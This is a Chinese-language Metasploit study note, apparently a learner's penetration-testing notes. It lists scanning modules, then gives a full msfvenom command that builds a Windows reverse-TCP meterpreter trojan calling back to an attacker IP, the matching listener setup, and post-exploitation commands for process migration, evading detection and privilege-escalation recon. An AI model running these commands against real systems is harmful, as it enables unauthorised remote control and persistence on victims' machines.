更新中
一.基础:
shell中直接输入msfconsole开始运行
- use +模块路径 使用模块
- search+模块关键字 用来搜索模块
- back 返回主界面
模块中:
-
info 查看模块信息
-
show options 查看模块设置项
-
show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选择target为64攻击不匹配,但是选择86却攻击成功,为什么呢?这个问题解决了,因为生成木马的时候会有生成64位还是32位的选项,默认是32位,也就是×86,因为木马是×86,既然x86的木马执行成功了,选择target自然也是x86)
-
expolit/run 开始执行
高级设置:
set AutoRunScript migrate -f 自动迁移进程
二.信息收集:
主机存活探测:auxiliary/scanner/discovery/arp_sweep ARP 扫描auxiliary/scanner/discovery/udp_sweep UDP 扫描auxiliary/scanner/netbios/nbname NETBIOS 扫描auxiliary/scanner/snmp/snmp_enum SNMP 扫描auxiliary/scanner/smb/smb_version SMB 扫描端口扫描:auxiliary/scanner/portscan/ack TCP ACK 端口扫描auxiliary/scanner/portscan/ftpbounce FTP bounce 端口扫描auxiliary/scanner/portscan/syn SYN 端口扫描auxiliary/scanner/portscan/tcp TCP 端口扫描auxiliary/scanner/portscan/xmas TCP XMas 端口扫描
使用方法:1.用内网的机器开个代理,使kali的流量可以到达内网,然后使用模块扫描2.使用后门连接,通过session进行扫描3.在同一个内网里面可以直接扫描(一般不会有这种情况吧,除非我带着电脑潜入目标地点)这三点适用于内网渗透的很多场景
三.渗透
3.1反向后门的使用
我的话:
反弹shell是等受害机器来连接我,所以我在这里的设置,不需要去设置受害机器的ip,因为只要受害机器知道来哪里找我就行了
生成反向后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.43 lport=18888 -f exe >gg.exe
(
高亮为可设置参数,
lhost是监听机ip地址(也就是攻击者kali的ip地址)lport是监听端口(也就是攻击者准备接收反弹回来的shell的那个端口)
)
监听后门:
use exploit/multi/handler
use exploit/multi/handler #通过use选择监听模块
set payload windows/meterpreter/reverse_tcp #选择设置反弹shell的监听(这一步我有几次忽略了,导致出现错误,连接失败,所以这一步一定不要落下,设置监听的类型)
set lhost 192.168.43.43 #这里的ip和端口应该和后门代码保持一致
set lport 18888
exploit #开始执行
meterpreter
获取到shell后,会为被控制的机器开启一个session(会话),msf可以同时监听多个session,并且在不同的session之间随意切换,黑客在session中执行命令等同于在目标主机执行命令,也可以使用msf的攻击模块通过session对目标主机进行攻击。在session中执行命令的模式也被称为meterpreter模式
session中:
getuid #获取当前用户的权限吧,看演示里面一般是作这个用的
migrate [进程号] #将后门进程迁移到其它进程里面,达到权限维持的效果(更不容易被发现)
help #可以显示在meterpreter模式下可以操作的指令列表(一部分)
search [-d dir] [-r recurse] -f pattern #在被控制的机器内搜索文件
shell #得到终端
background #把session放置后台
ps #列出所有进程,以及进程的信息(在这里可以看到pid,知道pid就可以使用kill来终止进程了)
session外:
session -l #列出当前的所有session以及其信息
sessions -K #关闭所有session连接,这里的k是大写
sessions -k [指定session的id] #杀死指定id的session
sessions [id号] #根据id号进入不同的session
3.2提权
补丁查询:
run post/windows/gather/enum_patches 查询补丁信息use post/multi/recon/local_exploit_suggester 这个模块可通过session查询当前可以用来提权的exp,(可能会失灵)